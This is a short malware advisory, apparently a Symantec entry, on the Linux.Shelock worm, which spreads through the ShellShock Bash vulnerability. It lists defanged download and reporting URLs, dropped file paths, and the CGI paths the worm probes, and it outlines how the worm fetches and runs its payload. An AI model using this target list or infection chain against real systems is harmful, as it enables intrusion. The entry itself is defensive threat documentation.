Home / malwarePDF  

Linux.Shelock


First posted on 10 April 2015.
Source: Symantec

Aliases :

There are no other names known for Linux.Shelock.

Explanation :

The worm arrives on the compromised computer after being downloaded from the following location:
[http://]109.228.25.87/.ips-80/cc.[REMOVED]
The worm attempts to exploit computers affected by the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271), also known as ShellShock or the Bash Bug.

When the worm is executed, it may create the following files:
/var/tmp/.cc/cgiscan32/var/tmp/.cc/cgiscan64/var/tmp/.cc/patch/var/tmp/.cc/paths/var/tmp/.cc/print/var/tmp/.cc/r/var/tmp/.cc/start/tmp/.cc/cgiscan32/tmp/.cc/cgiscan64/tmp/.cc/patch/tmp/.cc/paths/tmp/.cc/print/tmp/.cc/r/tmp/.cc/start
The worm will download a list of IP addresses from the following location:
[http://]109.228.25.87/.ips-80/[THREE CH[REMOVED]
The worm scans the IP address list and attempts to exploit them.

The worm connects to a target IP address using the following paths:
/cgi-bin/php/cgi-bin/bash/cgi-bin/contact.cgi/cgi-bin/defaultwebpage.cgi/cgi-bin/env.cgi/cgi-bin/fire.cgi/cgi-bin/forum.cgi/cgi-bin/hello.cgi/cgi-bin/index.cgi/cgi-bin/login.cgi/cgi-bin/main.cgi/cgi-bin/meme.cgi/cgi-bin/php4/cgi-bin/php5/cgi-bin/php5-cli/cgi-bin/recent.cgi/cgi-bin/sat-ir-web.pl/cgi-bin-sdb/printenv/cgi-bin/test-cgi/cgi-bin/test.cgi/cgi-bin/test-cgi.pl/cgi-bin/test.sh/cgi-bin/tools/tools.pl/cgi-mod/index.cgi/cgi-sys/defaultwebpage.cgi/cgi-sys/entropysearch.cgi/cgi-sys/php5/phppath/cgi_wrapper/phppath/php
The worm sends the target IP address to the following location:
[http://]109.228.25.87/.c.[REMOVED]
The worm contains a Perl script which will run on the IP address if it is vulnerable.

The worm uses the Perl script to download and execute a Bash script from the following location:
[http://]109.228.25.87/.c.[REMOVED]
The worm downloads and executes the Linux.Shelock malware from the following location on the vulnerable IP address:
[http://]109.228.25.87/.ips-80/cc.[REMOVED]

Last update 10 April 2015

 

TOP